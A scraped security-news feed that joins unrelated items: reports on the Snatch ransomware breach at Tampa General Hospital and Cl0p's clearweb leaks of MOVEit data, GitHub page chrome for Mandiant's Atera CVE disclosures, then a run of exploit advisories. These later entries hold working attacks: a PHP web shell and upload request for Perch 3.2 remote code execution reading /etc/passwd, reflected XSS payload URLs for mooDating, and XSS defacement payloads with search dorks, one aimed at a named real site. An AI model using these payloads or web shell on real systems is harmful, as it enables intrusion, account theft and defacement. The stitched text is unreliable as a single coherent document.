Categories: News
Categories: Ransomware
Tags: Tampa

Tags:  General Hospital

Tags:  Snatch

Tags:  ransomware

Tags:  RDP

Tags:  data breach

The Tampa General Hospital has promised to reach out to the individuals whose information has been stolen by the Snatch ransomware group.



(Read more...)




The post Tampa General Hospital half thwarts ransomware attack, but still loses patient data appeared first on Malwarebytes Labs.

The Tampa General Hospital (TGH) has promised to reach out to individuals whose information has been stolen by a ransomware group.

In a cybersecurity notice, TGH said it noticed unusual activity on its computer systems on May 31, 2023.

> “Fortunately, TGH’s monitoring systems and experienced technology professionals effectively prevented encryption, which would have significantly interrupted the hospital’s ability to provide care for patients.”

While that is good news from a healthcare perspective, the ransomware operators did obtain something of value. An investigation learned that an unauthorized third party accessed TGH’s network and obtained files from its systems between May 12 and May 30, 2023.

Further investigation showed that some patient information was included. The information varied from person to person, but may have included names, addresses, phone numbers, dates of birth, Social Security numbers (SSNs), health insurance information, medical record numbers, patient account numbers, dates of service and/or limited treatment information used by TGH for its business operations.

According to TGH, the criminals did not access the hospital's electronic medical record system.

TGH says it is mailing letters to individuals whose information may have been compromised, and will provide complimentary credit monitoring and identity theft protection services to those whose Social Security numbers were accessed.

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor's advice. Every breach is different, so check with the vendor to find out what's happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don't use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

**Snatch ransomware**

On July 18, 2023, Snatch ransomware group claimed responsibility for the data theft on its leak site.

At Malwarebytes, we've been tracking the Snatch group since 2019. The group is suspected to operate from Russia. Back in 2019, the group stood out because it deployed a somewhat new technique for ransomware which forced the affected machine to reboot into safe mode without networking. Safe mode starts Windows in a basic state, using a limited set of files and drivers. It’s intended for troubleshooting, but since many monitoring tools will not work in safe mode, it allowed for an undisturbed and quicker encryption process. By choosing the “without networking” mode, administrators lose view of the system. The Snatch ransomware added itself as a service which ran in safe mode. Interestingly, for some reason the group no longer uses that method.

Their most common attack vectors include brute-force attacks against vulnerable, exposed services such as RDP, VNC (Virtual Network Computing), and TeamViewer. Programmed in Go, the ransomware component is separate from the data stealer. We have not seen the multi-platform capabilities of Go put to use, and only Windows machines are affected.

Malwarebytes detects the Snatch ransomware as Ransom.Snatch.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR remove all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Tampa General Hospital half thwarts ransomware attack, but still loses patient data

By Deeba Ahmed
The Cl0p Ransomware Gang has begun its clearweb journey by leaking data stolen from PWC.com.
This is a post from HackRead.com Read the original post: Cl0p Ransomware Gang Leaks MOVEit Data on Clearweb Sites

At the time of writing, the clearweb domain of the Cl0p Ransomware Gang was offline; however, the gang’s entry to the clearweb reveals upcoming cybersecurity threats intended for their victims.

The Cl0p ransomware gang is among the cybercrime syndicates that have exploited the MOVEit vulnerability more extensively than any other. To exacerbate the situation, the ransomware gang is now leaking the data it stole through the MOVEit vulnerability on its clearweb domain.

According to security researcher Dominic Alvieri, the Cl0p ransomware gang is leaking the data they stole from the MOVEit Transfer platform in May on the publicly accessible website. The gang exploited a zero-day vulnerability in the secure file transfer platform, leading to a data breach that drastically impacted hundreds of businesses and government institutions worldwide. 

Cl0p has dumped the data as large downloadable files instead of opting for specific searchable items and didn’t host the site on the Tor network, as has been the case in many previous data leaks.

Screenshot from Cl0p’s dark web domain (Image credit: Hackread.com)

**What is the difference between Clearweb and Dark Web**

The Clearweb, also known as the Surface Web or Visible Web, refers to the part of the internet that is easily accessible and indexed by search engines like Google. It includes websites and web pages that can be accessed through standard web browsers without requiring any special configurations.

On the other hand, the Dark Web is a portion of the internet that is intentionally hidden and not indexed by traditional search engines. Accessing the Dark Web requires specialized software, such as the Tor browser, which provides anonymity and encryption.

This anonymity allows users to access hidden websites that use “.onion” domains. The Dark Web is often associated with illicit activities, illegal marketplaces, and anonymous forums where users can communicate without revealing their identities.

It is worth noting that Cl0p has recently developed this tactic to blackmail their victims where the gang creates Clearnet websites hosted on the surface web to leak stolen data. They first tried this tactic to leak data stolen from the PWC business consulting firm, which was uploaded in four spanned ZIP archives. Later Cl0p used the same tactic for leaking data from TD Ameritrade, Aon, Kirkland, and Ernest & Young.

Screenshot from Cl0p’s clearweb domain (Image credit: Hackread.com)

Perhaps, the Cl0p ransomware gang believes it to be a more effective method for extorting victims (even though such websites get quickly removed). Leaking data on Tor-hosted darknet platforms has lost the charm given their restricted reach.

Although Tor offers anonymity, not all users can access the sites without a specialized browser, whereas, on the surface web, anyone having the website link can download the stolen data.

Another reason is that search engines don’t index darknet content, so, download speed is usually pretty slow, whereas, on Clearweb, the site gets indexed, and downloading is quicker. Nonetheless, this tactic is more detrimental for the victims as they become vulnerable to harassment and online scams from all fronts.

Cl0p is among the most notorious hacking gangs currently having successfully targeted high-profile firms and extracted millions of dollars in ransom. Per Coveware’s latest report, the gang has raked in $75-$100 million from their latest MOVEit attacks. Coveware CEO Bill Siegel noted that only a handful of Cl0p’s victims generally give in to their demands.

Therefore, the hackers are using different extortion strategies. Siegel also noted that MOVEit attacks have proven far more successful than GoAnywhere data theft, where the hackers could breach 130 victims and didn’t receive their desired ransom as well.

As expected, all Clearweb extortion sites created by the Cl0p ransomware gang have been taken offline, proving the short-lived nature of this method. Security researchers highlighted that Cl0p’s latest site lacks the sophistication seen in the approach used by the rival ALPHV ransomware gang, aka BlackCat, which introduced this method to pressurize their victims more profoundly.

**RELATED ARTICLES**

1.  Big Head Ransomware Found in Fake Windows Updates
2.  LockBit Ransomware Expands Attack Spectrum to Mac Devices
3.  Genesis Market’s Clearnet domain seized; Dark Web site still online

Cl0p Ransomware Gang Leaks MOVEit Data on Clearweb Sites

Atera Agent through 1.8.3.6 on Windows Creates a Temporary File in a Directory with Insecure Permissions.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Customer Stories
    *   White papers, Ebooks, Webinars
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

mandiant / **Vulnerability-Disclosures** Public

*   Notifications
*   Fork 51
*   Star 146
    

146 stars 51 forks Activity

Star

Notifications

*   Code
*   Issues 3
*   Pull requests
*   Actions
*   Projects
*   Security
*   Insights

More

master

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

Aaron Carreras Add Atera CVE-2023-26077 and CVE-2023-26078 for Andrew Oliveau.

79876c5

Jul 24, 2023

Add Atera CVE-2023-26077 and CVE-2023-26078 for Andrew Oliveau.

79876c5

**Git stats**

*   **134** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

2022

2023

FEYE-2019-0001

FEYE-2019-0002

FEYE-2019-0003

FEYE-2019-0004

FEYE-2019-0005

FEYE-2019-0006

FEYE-2019-0007

FEYE-2019-0008

FEYE-2019-0009

FEYE-2019-0010

FEYE-2019-0011

FEYE-2019-0012

FEYE-2019-0013

FEYE-2019-0014

FEYE-2019-0015

FEYE-2020-0001

FEYE-2020-0002

FEYE-2020-0003

FEYE-2020-0004

FEYE-2020-0005

FEYE-2020-0006

FEYE-2020-0007

FEYE-2020-0008

FEYE-2020-0009

FEYE-2020-0010

FEYE-2020-0011

FEYE-2020-0012

FEYE-2020-0013

FEYE-2020-0014

FEYE-2020-0015

FEYE-2020-0016

FEYE-2020-0017

FEYE-2020-0018

FEYE-2020-0019

FEYE-2020-0020

FEYE-2021-0001

FEYE-2021-0002

FEYE-2021-0003

FEYE-2021-0004

FEYE-2021-0005

FEYE-2021-0006

FEYE-2021-0007

FEYE-2021-0008

FEYE-2021-0009

FEYE-2021-0010

FEYE-2021-0011

FEYE-2021-0012

FEYE-2021-0013

FEYE-2021-0014

FEYE-2021-0015

FEYE-2021-0016

FEYE-2021-0017

FEYE-2021-0018

FEYE-2021-0019

FEYE-2021-0020

FEYE-2021-0021

FEYE-2021-0022

FEYE-2021-0023

FEYE-2021-0024

FEYE-2021-0025

MNDT-2021-0001

MNDT-2021-0002

MNDT-2021-0003

MNDT-2021-0004

MNDT-2021-0005

MNDT-2021-0006

MNDT-2021-0007

MNDT-2021-0008

MNDT-2021-0009

MNDT-2021-0010

MNDT-2021-0011

MNDT-2021-0012

README.md

**README.md**

**Mandiant Vulnerability Disclosures**

This repository details vulnerabilities disclosed by Mandiant. These vulnerabilities were discovered by internal research, through Red Team assessments, or in use in the wild. Proof of concepts (PoCs) may or may not be provided.

The following _licenses/licensing_ apply to this Mandiant repository:

1.  CC BY-SA 4.0 - For CVE related information not including source code (such as PoCs)
2.  MIT - For source code contained within provided CVE information

Mandiant coordinates and handles Vulnerability Disclosures in accordance with Google's Vulnerability Disclosure Policy.

**About**

No description, website, or topics provided.

**Resources**

Readme

Activity

**Stars**

**146** stars

**Watchers**

**26** watching

**Forks**

**51** forks

Report repository

**Releases**

No releases published

**Packages**

No packages published  

**Contributors 4**

*    **RonnieSalomonsen** Ronnie Salomonsen
*    **aaronc100** Aaron Carreras
*    **attritionorg** Jericho
*    **ziadhany** ziad hany

**Languages**

*   C++ 100.0%

CVE-2023-26077: GitHub - mandiant/Vulnerability-Disclosures

Privilege escalation vulnerability was discovered in Atera Agent 1.8.4.4 and prior on Windows due to mishandling of privileged APIs.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-26078: Vulnerability-Disclosures/2023/MNDT-2023-0009.md at master · mandiant/Vulnerability-Disclosures

Perch version 3.2 suffers from a remote code execution vulnerability.

    Exploit Title: Perch v3.2 - Remote Code Execution (RCE)Application: Perch CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://grabaperch.com/Software Link: https://grabaperch.com/downloadDate of found: 21.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)4. upload poc.phar filepoc.phar file contents :<?php $a=$_GET['code']; echo system($a);?>5. visit  http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwdpoc request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1Host: localhostContent-Length: 1071Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9Connection: close------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceTitle"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image"; filename="poc.phar"Content-Type: application/octet-stream<?php $a=$_GET['code']; echo system($a);?>------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_field"1------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_assetID"------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceBucket"admin------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="tags"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="btnsubmit"Submit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="formaction"edit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="token"5494af3e8dbe5ac399ca7f12219cfe82------WebKitFormBoundaryYGoerZn09hHSjd4Z--

Perch 3.2 Remote Code Execution

mooDating version 1.2 suffers from a cross site scripting vulnerability.

# Exploit Title: mooDating 1.2 - Reflected XSS  
# Exploit Author: CraCkEr aka (skalvin)  
# Date: 22/07/2023  
# Vendor: mooSocial  
# Vendor Homepage: https://moodatingscript.com/  
# Software Link: https://demo.moodatingscript.com/home  
# Tested on: Windows 10 Pro  
# Impact: Manipulate the content of the site  
# CVE: CVE-2023-3849 - CVE-2023-3848 - CVE-2023-3847 - CVE-2023-3846  
       CVE-2023-3843 - CVE-2023-3845 - CVE-2023-3844

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka    
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message  
can perform a wide variety of actions, such as stealing the victim's session token or login credentials

Path: /matchmakings/question

URL parameter is vulnerable to RXSS

https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=  
https://website/matchmakings/question[XSS]?number=

Path: /friends

URL parameter is vulnerable to RXSS

https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model  
https://website/friends[XSS]/ajax_invite?mode=model

Path: /friends/ajax_invite

URL parameter is vulnerable to RXSS

https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model  
https://website/friends/ajax_invite[XSS]?mode=model

Path: /pages

URL parameter is vulnerable to RXSS

https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l  
https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l

Path: /users

URL parameter is vulnerable to RXSS

https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity  
https://website/user[XSS]/view/108?tab=activity

Path: /users/view

URL parameter is vulnerable to RXSS

https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity  
https://website/users/view[XSS]/108?tab=activity

Path: /find-a-match

URL parameter is vulnerable to RXSS

https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0  
https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0

[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6

[-] Done

mooDating 1.2 Cross Site Scripting

CMSctweb Creative version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMSctweb creative v 1.0 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://www.contedia.com/                                                                                           |  | # Dork      : "ct web design by brown bear creative" inurl:.php?id=                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /department.php?id=39'<script>alert(/indoushka/);</script>[+] http://www.canterburyct.org/department.php?id=39%27%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMSctweb Creative 1.0 Cross Site Scripting

CMS Ultimate Solutions DreamSus version 1.4 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS Ultimate Solutions DreamSus v1.4 XSS Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://dreamsus.com                                                                                                |  | # Dork      : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /gallery1.php?adjacents=3div_disp=false&gallery_type=Extra%2520Curriculum'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>&tpages=4[+] http://127.0.0.1/spcollegejejurieduin/gallery1.php?adjacents=3div_disp=false&gallery_type=Extra%2520Curriculum%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&tpages=4Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS Ultimate Solutions DreamSus 1.4 Cross Site Scripting

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from an open redirection vulnerability.

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.6 Open Redirect Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/[+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WordPress Page Builder KingComposer 2.9.6 Open Redirection

WordPress Image Optimization plugin version 3.8.2 suffers from an open redirection vulnerability.

    ====================================================================================================================================| # Title     : WordPress Image Optimization 3.8.2 Open Redirect Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://wordpress.org/plugins/optimole-wp/                                                                         |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /w:auto/h:auto/q:90/https://packetstatic.com/uimg1675889793/156867/150.jpg[+] https://mlsxkssu4flj.i.optimolecom/nyJIGCw._y-W~3254a/w:auto/h:auto/q:90/https://packetstatic.com/uimg1675889793/156867/150.jpgGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#windows